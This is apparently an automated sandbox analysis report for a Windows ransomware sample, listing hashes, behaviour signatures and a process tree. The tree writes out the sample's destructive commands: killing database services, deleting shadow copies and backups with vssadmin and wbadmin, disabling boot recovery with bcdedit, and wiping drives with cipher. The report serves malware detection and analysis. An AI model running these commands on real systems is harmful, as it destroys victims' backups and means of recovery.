Analysis

  • max time kernel
    164s
  • max time network
    146s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240226-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system
  • submitted
    27-02-2024 18:03

General

  • Target

    f38949dac0ebf8040648e8a95b1f06ad90cfe1242cc5c227707ac47f250fa56c.exe

  • Size

    419KB

  • MD5

    17073229079e31a3190e7a8509302b22

  • SHA1

    6ed12dade62a8e420c5b5b295ddd6c4ce83b9549

  • SHA256

    f38949dac0ebf8040648e8a95b1f06ad90cfe1242cc5c227707ac47f250fa56c

  • SHA512

    7afe620f907740393f021fcd337aaf5ed8b5e903aab3ed592d8695a1d877e41094bbc9aca20e8062c11acf2e288bd96033ffa08544d926be5493be26cb79c647

  • SSDEEP

    6144:4CmPvkrISw8ZMQsFMFEXmtT+n4CQi2oD9HoZwIYaTR/dXszI2lUC4c:L3W6MoFlV+n4CQRoD9IygT/L

Malware Config

Signatures

  • Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
  • Deletes shadow copies 2 TTPs

    Ransomware often targets backup files to inhibit system recovery.

  • Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
  • Renames multiple (142) files with added filename extension

    This suggests ransomware activity of encrypting all the files on the system.

  • Deletes System State backups 3 TTPs 1 IoCs

    Uses wbadmin.exe to inhibit system recovery.

  • Deletes system backups 3 TTPs 1 IoCs

    Uses wbadmin.exe to inhibit system recovery.

  • Modifies Installed Components in the registry 2 TTPs 1 IoCs
  • Adds Run key to start application 2 TTPs 2 IoCs
  • Enumerates connected drives 3 TTPs 26 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Drops file in Windows directory 3 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Interacts with shadow copies 2 TTPs 1 IoCs

    Shadow copies are often targeted by ransomware to inhibit system recovery.

  • Kills process with taskkill 14 IoCs
  • Modifies registry class 2 IoCs
  • Runs net.exe
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 50 IoCs
  • Suspicious use of FindShellTrayWindow 6 IoCs
  • Suspicious use of SendNotifyMessage 8 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Volume Shadow Copy service COM API

    The Volume Shadow Copy service is used to manage backups/snapshots.

Processes

  • C:\Users\Admin\AppData\Local\Temp\f38949dac0ebf8040648e8a95b1f06ad90cfe1242cc5c227707ac47f250fa56c.exe
    "C:\Users\Admin\AppData\Local\Temp\f38949dac0ebf8040648e8a95b1f06ad90cfe1242cc5c227707ac47f250fa56c.exe"
    1⤵
    • Suspicious use of NtCreateUserProcessOtherParentProcess
    • Adds Run key to start application
    • Enumerates connected drives
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of WriteProcessMemory
    PID:4100
    • C:\Windows\SysWOW64\cmd.exe
      \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c rem Kill "SQL"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:620
      • C:\Windows\system32\cmd.exe
        C:\Windows\sysnative\cmd.exe /c rem Kill "SQL"
        3⤵
          PID:1604
      • C:\Windows\SysWOW64\cmd.exe
        \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im sqlbrowser.exe
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:3248
        • C:\Windows\system32\cmd.exe
          C:\Windows\sysnative\cmd.exe /c taskkill -f -im sqlbrowser.exe
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:3872
          • C:\Windows\system32\taskkill.exe
            taskkill -f -im sqlbrowser.exe
            4⤵
            • Kills process with taskkill
            • Suspicious use of AdjustPrivilegeToken
            PID:732
      • C:\Windows\SysWOW64\cmd.exe
        \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im sql writer.exe
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:3876
        • C:\Windows\system32\cmd.exe
          C:\Windows\sysnative\cmd.exe /c taskkill -f -im sql writer.exe
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:2652
          • C:\Windows\system32\taskkill.exe
            taskkill -f -im sql writer.exe
            4⤵
            • Kills process with taskkill
            PID:1840
      • C:\Windows\SysWOW64\cmd.exe
        \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im sqlserv.exe
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:3320
        • C:\Windows\system32\cmd.exe
          C:\Windows\sysnative\cmd.exe /c taskkill -f -im sqlserv.exe
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:1600
          • C:\Windows\system32\taskkill.exe
            taskkill -f -im sqlserv.exe
            4⤵
            • Kills process with taskkill
            • Suspicious use of AdjustPrivilegeToken
            PID:464
      • C:\Windows\SysWOW64\cmd.exe
        \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im msmdsrv.exe
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:2868
        • C:\Windows\system32\cmd.exe
          C:\Windows\sysnative\cmd.exe /c taskkill -f -im msmdsrv.exe
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:844
          • C:\Windows\system32\taskkill.exe
            taskkill -f -im msmdsrv.exe
            4⤵
            • Kills process with taskkill
            • Suspicious use of AdjustPrivilegeToken
            PID:4528
      • C:\Windows\SysWOW64\cmd.exe
        \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im MsDtsSrvr.exe
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:3276
        • C:\Windows\system32\cmd.exe
          C:\Windows\sysnative\cmd.exe /c taskkill -f -im MsDtsSrvr.exe
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:4800
          • C:\Windows\system32\taskkill.exe
            taskkill -f -im MsDtsSrvr.exe
            4⤵
            • Kills process with taskkill
            • Suspicious use of AdjustPrivilegeToken
            PID:3640
            • C:\Windows\system32\taskkill.exe
              taskkill -f -im pg_ctl.exe
              5⤵
              • Kills process with taskkill
              • Suspicious use of AdjustPrivilegeToken
              PID:3780
      • C:\Windows\SysWOW64\cmd.exe
        \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im sqlceip.exe
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:4928
        • C:\Windows\system32\cmd.exe
          C:\Windows\sysnative\cmd.exe /c taskkill -f -im sqlceip.exe
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:1176
          • C:\Windows\system32\taskkill.exe
            taskkill -f -im sqlceip.exe
            4⤵
            • Kills process with taskkill
            • Suspicious use of AdjustPrivilegeToken
            PID:4004
      • C:\Windows\SysWOW64\cmd.exe
        \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im fdlauncher.exe
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:4500
        • C:\Windows\system32\cmd.exe
          C:\Windows\sysnative\cmd.exe /c taskkill -f -im fdlauncher.exe
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:4452
          • C:\Windows\system32\taskkill.exe
            taskkill -f -im fdlauncher.exe
            4⤵
            • Kills process with taskkill
            • Suspicious use of AdjustPrivilegeToken
            PID:4328
      • C:\Windows\SysWOW64\cmd.exe
        \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im Ssms.exe
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:1856
        • C:\Windows\system32\cmd.exe
          C:\Windows\sysnative\cmd.exe /c taskkill -f -im Ssms.exe
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:1300
          • C:\Windows\system32\taskkill.exe
            taskkill -f -im Ssms.exe
            4⤵
            • Kills process with taskkill
            • Suspicious use of AdjustPrivilegeToken
            PID:840
      • C:\Windows\SysWOW64\cmd.exe
        \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im SQLAGENT.EXE
        2⤵
          PID:5032
          • C:\Windows\system32\cmd.exe
            C:\Windows\sysnative\cmd.exe /c taskkill -f -im SQLAGENT.EXE
            3⤵
              PID:4880
              • C:\Windows\system32\taskkill.exe
                taskkill -f -im SQLAGENT.EXE
                4⤵
                • Kills process with taskkill
                • Suspicious use of AdjustPrivilegeToken
                PID:3872
          • C:\Windows\SysWOW64\cmd.exe
            \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im fdhost.exe
            2⤵
              PID:2192
              • C:\Windows\system32\cmd.exe
                C:\Windows\sysnative\cmd.exe /c taskkill -f -im fdhost.exe
                3⤵
                  PID:2652
                  • C:\Windows\system32\taskkill.exe
                    taskkill -f -im fdhost.exe
                    4⤵
                    • Kills process with taskkill
                    • Suspicious use of AdjustPrivilegeToken
                    PID:2332
              • C:\Windows\SysWOW64\cmd.exe
                \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im ReportingServicesService.exe
                2⤵
                  PID:3804
                  • C:\Windows\system32\cmd.exe
                    C:\Windows\sysnative\cmd.exe /c taskkill -f -im ReportingServicesService.exe
                    3⤵
                      PID:2416
                      • C:\Windows\system32\taskkill.exe
                        taskkill -f -im ReportingServicesService.exe
                        4⤵
                        • Kills process with taskkill
                        • Suspicious use of AdjustPrivilegeToken
                        PID:744
                  • C:\Windows\SysWOW64\cmd.exe
                    \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im msftesql.exe
                    2⤵
                      PID:3356
                      • C:\Windows\system32\cmd.exe
                        C:\Windows\sysnative\cmd.exe /c taskkill -f -im msftesql.exe
                        3⤵
                          PID:1260
                      • C:\Windows\SysWOW64\cmd.exe
                        \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -im pg_ctl.exe
                        2⤵
                          PID:1836
                          • C:\Windows\system32\cmd.exe
                            C:\Windows\sysnative\cmd.exe /c taskkill -f -im pg_ctl.exe
                            3⤵
                              PID:3640
                          • C:\Windows\SysWOW64\cmd.exe
                            \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c taskkill -f -impostgres.exe
                            2⤵
                              PID:2848
                              • C:\Windows\system32\cmd.exe
                                C:\Windows\sysnative\cmd.exe /c taskkill -f -impostgres.exe
                                3⤵
                                  PID:4608
                                  • C:\Windows\system32\taskkill.exe
                                    taskkill -f -impostgres.exe
                                    4⤵
                                    • Kills process with taskkill
                                    PID:1772
                              • C:\Windows\SysWOW64\cmd.exe
                                \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c net stop MSSQLServerADHelper100
                                2⤵
                                  PID:1832
                                  • C:\Windows\system32\cmd.exe
                                    C:\Windows\sysnative\cmd.exe /c net stop MSSQLServerADHelper100
                                    3⤵
                                      PID:1768
                                      • C:\Windows\system32\net.exe
                                        net stop MSSQLServerADHelper100
                                        4⤵
                                          PID:2080
                                          • C:\Windows\system32\net1.exe
                                            C:\Windows\system32\net1 stop MSSQLServerADHelper100
                                            5⤵
                                              PID:428
                                      • C:\Windows\SysWOW64\cmd.exe
                                        \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c net stop MSSQL$ISARS
                                        2⤵
                                          PID:1660
                                          • C:\Windows\system32\cmd.exe
                                            C:\Windows\sysnative\cmd.exe /c net stop MSSQL$ISARS
                                            3⤵
                                              PID:1856
                                              • C:\Windows\system32\net.exe
                                                net stop MSSQL$ISARS
                                                4⤵
                                                  PID:2996
                                                  • C:\Windows\system32\net1.exe
                                                    C:\Windows\system32\net1 stop MSSQL$ISARS
                                                    5⤵
                                                      PID:2888
                                              • C:\Windows\SysWOW64\cmd.exe
                                                \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c net stop MSSQL$MSFW
                                                2⤵
                                                  PID:4036
                                                  • C:\Windows\system32\cmd.exe
                                                    C:\Windows\sysnative\cmd.exe /c net stop MSSQL$MSFW
                                                    3⤵
                                                      PID:1964
                                                      • C:\Windows\system32\net.exe
                                                        net stop MSSQL$MSFW
                                                        4⤵
                                                          PID:3792
                                                          • C:\Windows\system32\net1.exe
                                                            C:\Windows\system32\net1 stop MSSQL$MSFW
                                                            5⤵
                                                              PID:912
                                                      • C:\Windows\SysWOW64\cmd.exe
                                                        \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c net stop SQLAgent$ISARS
                                                        2⤵
                                                          PID:4872
                                                          • C:\Windows\system32\cmd.exe
                                                            C:\Windows\sysnative\cmd.exe /c net stop SQLAgent$ISARS
                                                            3⤵
                                                              PID:3824
                                                              • C:\Windows\system32\net.exe
                                                                net stop SQLAgent$ISARS
                                                                4⤵
                                                                  PID:1436
                                                                  • C:\Windows\system32\net1.exe
                                                                    C:\Windows\system32\net1 stop SQLAgent$ISARS
                                                                    5⤵
                                                                      PID:3184
                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c net stop SQLAgent$MSFW
                                                                2⤵
                                                                  PID:4836
                                                                  • C:\Windows\system32\cmd.exe
                                                                    C:\Windows\sysnative\cmd.exe /c net stop SQLAgent$MSFW
                                                                    3⤵
                                                                      PID:468
                                                                      • C:\Windows\system32\net.exe
                                                                        net stop SQLAgent$MSFW
                                                                        4⤵
                                                                          PID:4904
                                                                          • C:\Windows\system32\net1.exe
                                                                            C:\Windows\system32\net1 stop SQLAgent$MSFW
                                                                            5⤵
                                                                              PID:4812
                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                        \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c net stop SQLBrowser
                                                                        2⤵
                                                                          PID:4528
                                                                          • C:\Windows\system32\cmd.exe
                                                                            C:\Windows\sysnative\cmd.exe /c net stop SQLBrowser
                                                                            3⤵
                                                                              PID:1868
                                                                              • C:\Windows\system32\net.exe
                                                                                net stop SQLBrowser
                                                                                4⤵
                                                                                  PID:2452
                                                                                  • C:\Windows\system32\net1.exe
                                                                                    C:\Windows\system32\net1 stop SQLBrowser
                                                                                    5⤵
                                                                                      PID:3640
                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c net stop REportServer$ISARS
                                                                                2⤵
                                                                                  PID:3780
                                                                                  • C:\Windows\system32\cmd.exe
                                                                                    C:\Windows\sysnative\cmd.exe /c net stop REportServer$ISARS
                                                                                    3⤵
                                                                                      PID:3340
                                                                                      • C:\Windows\system32\net.exe
                                                                                        net stop REportServer$ISARS
                                                                                        4⤵
                                                                                          PID:4424
                                                                                          • C:\Windows\system32\net1.exe
                                                                                            C:\Windows\system32\net1 stop REportServer$ISARS
                                                                                            5⤵
                                                                                              PID:4912
                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                        \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c net stop SQLWriter
                                                                                        2⤵
                                                                                          PID:1888
                                                                                          • C:\Windows\system32\cmd.exe
                                                                                            C:\Windows\sysnative\cmd.exe /c net stop SQLWriter
                                                                                            3⤵
                                                                                              PID:2968
                                                                                              • C:\Windows\system32\net.exe
                                                                                                net stop SQLWriter
                                                                                                4⤵
                                                                                                  PID:2080
                                                                                                  • C:\Windows\system32\net1.exe
                                                                                                    C:\Windows\system32\net1 stop SQLWriter
                                                                                                    5⤵
                                                                                                      PID:4356
                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c vssadmin.exe Delete Shadows /All /Quiet
                                                                                                2⤵
                                                                                                  PID:4352
                                                                                                  • C:\Windows\system32\cmd.exe
                                                                                                    C:\Windows\sysnative\cmd.exe /c vssadmin.exe Delete Shadows /All /Quiet
                                                                                                    3⤵
                                                                                                      PID:2104
                                                                                                      • C:\Windows\system32\vssadmin.exe
                                                                                                        vssadmin.exe Delete Shadows /All /Quiet
                                                                                                        4⤵
                                                                                                        • Interacts with shadow copies
                                                                                                        PID:2416
                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                    \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c wbadmin delete backup -keepVersion:0 -quiet
                                                                                                    2⤵
                                                                                                      PID:1832
                                                                                                      • C:\Windows\system32\cmd.exe
                                                                                                        C:\Windows\sysnative\cmd.exe /c wbadmin delete backup -keepVersion:0 -quiet
                                                                                                        3⤵
                                                                                                          PID:2056
                                                                                                          • C:\Windows\system32\wbadmin.exe
                                                                                                            wbadmin delete backup -keepVersion:0 -quiet
                                                                                                            4⤵
                                                                                                            • Deletes system backups
                                                                                                            PID:464
                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                        \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c wmic.exe SHADOWCOPY /nointeractive
                                                                                                        2⤵
                                                                                                          PID:1608
                                                                                                          • C:\Windows\system32\cmd.exe
                                                                                                            C:\Windows\sysnative\cmd.exe /c wmic.exe SHADOWCOPY /nointeractive
                                                                                                            3⤵
                                                                                                              PID:4492
                                                                                                              • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                                wmic.exe SHADOWCOPY /nointeractive
                                                                                                                4⤵
                                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                                PID:3028
                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                            \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures
                                                                                                            2⤵
                                                                                                              PID:3948
                                                                                                              • C:\Windows\system32\cmd.exe
                                                                                                                C:\Windows\sysnative\cmd.exe /c bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures
                                                                                                                3⤵
                                                                                                                  PID:1436
                                                                                                                  • C:\Windows\system32\bcdedit.exe
                                                                                                                    bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures
                                                                                                                    4⤵
                                                                                                                    • Modifies boot configuration data using bcdedit
                                                                                                                    PID:1180
                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c bcdedit.exe /set {default} recoverynabled No
                                                                                                                2⤵
                                                                                                                  PID:1872
                                                                                                                  • C:\Windows\system32\cmd.exe
                                                                                                                    C:\Windows\sysnative\cmd.exe /c bcdedit.exe /set {default} recoverynabled No
                                                                                                                    3⤵
                                                                                                                      PID:2652
                                                                                                                      • C:\Windows\system32\bcdedit.exe
                                                                                                                        bcdedit.exe /set {default} recoverynabled No
                                                                                                                        4⤵
                                                                                                                        • Modifies boot configuration data using bcdedit
                                                                                                                        PID:3448
                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                    \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c wbadmin DELETE SYSTEMSTABACKUP -deleteOldest
                                                                                                                    2⤵
                                                                                                                      PID:2364
                                                                                                                      • C:\Windows\system32\cmd.exe
                                                                                                                        C:\Windows\sysnative\cmd.exe /c wbadmin DELETE SYSTEMSTABACKUP -deleteOldest
                                                                                                                        3⤵
                                                                                                                          PID:4304
                                                                                                                          • C:\Windows\system32\wbadmin.exe
                                                                                                                            wbadmin DELETE SYSTEMSTABACKUP -deleteOldest
                                                                                                                            4⤵
                                                                                                                              PID:4812
                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                          \\?\C:\Windows\SysWOW64\cmd.exe /c %windir%\sysnative\cmd.exe /c wbadmin DELETE SYSTEMSTATEBACKUP
                                                                                                                          2⤵
                                                                                                                            PID:1408
                                                                                                                            • C:\Windows\system32\cmd.exe
                                                                                                                              C:\Windows\sysnative\cmd.exe /c wbadmin DELETE SYSTEMSTATEBACKUP
                                                                                                                              3⤵
                                                                                                                                PID:1804
                                                                                                                                • C:\Windows\system32\wbadmin.exe
                                                                                                                                  wbadmin DELETE SYSTEMSTATEBACKUP
                                                                                                                                  4⤵
                                                                                                                                  • Deletes System State backups
                                                                                                                                  • Drops file in Windows directory
                                                                                                                                  PID:4904
                                                                                                                            • C:\Windows\SYSTEM32\cipher.exe
                                                                                                                              cipher /w:\\?\A:
                                                                                                                              2⤵
                                                                                                                              • Enumerates connected drives
                                                                                                                              PID:3320
                                                                                                                            • C:\Windows\SYSTEM32\cipher.exe
                                                                                                                              cipher /w:\\?\C:
                                                                                                                              2⤵
                                                                                                                                PID:1288
                                                                                                                              • C:\Windows\SYSTEM32\cipher.exe
                                                                                                                                cipher /w:\\?\F:
                                                                                                                                2⤵
                                                                                                                                • Enumerates connected drives
                                                                                                                                PID:744
                                                                                                                            • C:\Windows\Explorer.EXE
                                                                                                                              C:\Windows\Explorer.EXE
                                                                                                                              1⤵
                                                                                                                                PID:3560
                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\f38949dac0ebf8040648e8a95b1f06ad90cfe1242cc5c227707ac47f250fa56c.exe
                                                                                                                                  \\?\C:\Users\Admin\AppData\Local\Temp\f38949dac0ebf8040648e8a95b1f06ad90cfe1242cc5c227707ac47f250fa56c.exe -network
                                                                                                                                  2⤵
                                                                                                                                  • Adds Run key to start application
                                                                                                                                  PID:3620
                                                                                                                              • C:\Windows\system32\taskkill.exe
                                                                                                                                taskkill -f -im msftesql.exe
                                                                                                                                1⤵
                                                                                                                                • Kills process with taskkill
                                                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                                                PID:4508
                                                                                                                              • C:\Windows\system32\vssvc.exe
                                                                                                                                C:\Windows\system32\vssvc.exe
                                                                                                                                1⤵
                                                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                                                PID:940
                                                                                                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=4076 --field-trial-handle=2284,i,2771196087253062161,8107167670425198948,262144 --variations-seed-version /prefetch:8
                                                                                                                                1⤵
                                                                                                                                  PID:1168
                                                                                                                                • C:\Windows\explorer.exe
                                                                                                                                  explorer.exe
                                                                                                                                  1⤵
                                                                                                                                  • Modifies Installed Components in the registry
                                                                                                                                  • Modifies registry class
                                                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                                                  • Suspicious use of FindShellTrayWindow
                                                                                                                                  • Suspicious use of SendNotifyMessage
                                                                                                                                  PID:5300

                                                                                                                                Network

                                                                                                                                MITRE ATT&CK Enterprise v15

                                                                                                                                Replay Monitor

                                                                                                                                Loading Replay Monitor...

                                                                                                                                Downloads

                                                                                                                                • C:\ProgramData\Microsoft\Search\Data\Applications\Windows\edbres00001.jrs

                                                                                                                                  Filesize

                                                                                                                                  1.0MB

                                                                                                                                  MD5

                                                                                                                                  ead7a951b78c6557419477cb787ee0bf

                                                                                                                                  SHA1

                                                                                                                                  24a1b10601936d2c5cae3dc298723a9c62afd5fb

                                                                                                                                  SHA256

                                                                                                                                  c1486b3cf916251a0d88b057c319c9f9b818709d9cb94dac462621337477e7c7

                                                                                                                                  SHA512

                                                                                                                                  55186adae197adfcbc7ea8780ab3644b1397a2f7b84aec13f9d6a4b959a4dcb3b15c201ab04368337b8a686d3535508f74147897ecf552cecf2c46ac9a693ae8

                                                                                                                                • C:\ProgramData\Microsoft\Windows\Caches\{DDF571F2-BE98-426D-8288-1A9A39C3FDA2}.2.ver0x0000000000000001.db.lock3

                                                                                                                                  Filesize

                                                                                                                                  624KB

                                                                                                                                  MD5

                                                                                                                                  efadff9f03e6460fb89bd64edc6c9102

                                                                                                                                  SHA1

                                                                                                                                  ef56d96f27906ea5ea2899fd4d3b598a116944a9

                                                                                                                                  SHA256

                                                                                                                                  0d5027990ba64e2f6bc287140161fddf44b1a6a0438b853bfeedb961869730d4

                                                                                                                                  SHA512

                                                                                                                                  a6254282923ec4a0d898e0101b13fad16152fdb423fbf4847cbd9cf808513b888be18334c17833ef630aba19da67af620f75346e4fe7263eb1b6b5e1fc861e1e

                                                                                                                                • C:\Users\Default\NTUSER.DAT{53b39e88-18c4-11ea-a811-000d3aa4692b}.TMContainer00000000000000000002.regtrans-ms

                                                                                                                                  Filesize

                                                                                                                                  513KB

                                                                                                                                  MD5

                                                                                                                                  0798686a3c416bba950611733bab0444

                                                                                                                                  SHA1

                                                                                                                                  d373e14edf1bae7394593d624b821ed36fd4cb13

                                                                                                                                  SHA256

                                                                                                                                  0e36a256bc2aaa6fb249d520e97140de69ddab102cfae1da5ea0cef2b337a35e

                                                                                                                                  SHA512

                                                                                                                                  cb565fa5f24c4ee0edfb5c8d3b61db04993d727608362101b0985eed5098260eea4a4673780d3e04869a0dbeab110dd734a717e390ef1b26bd7c7715ffe142b7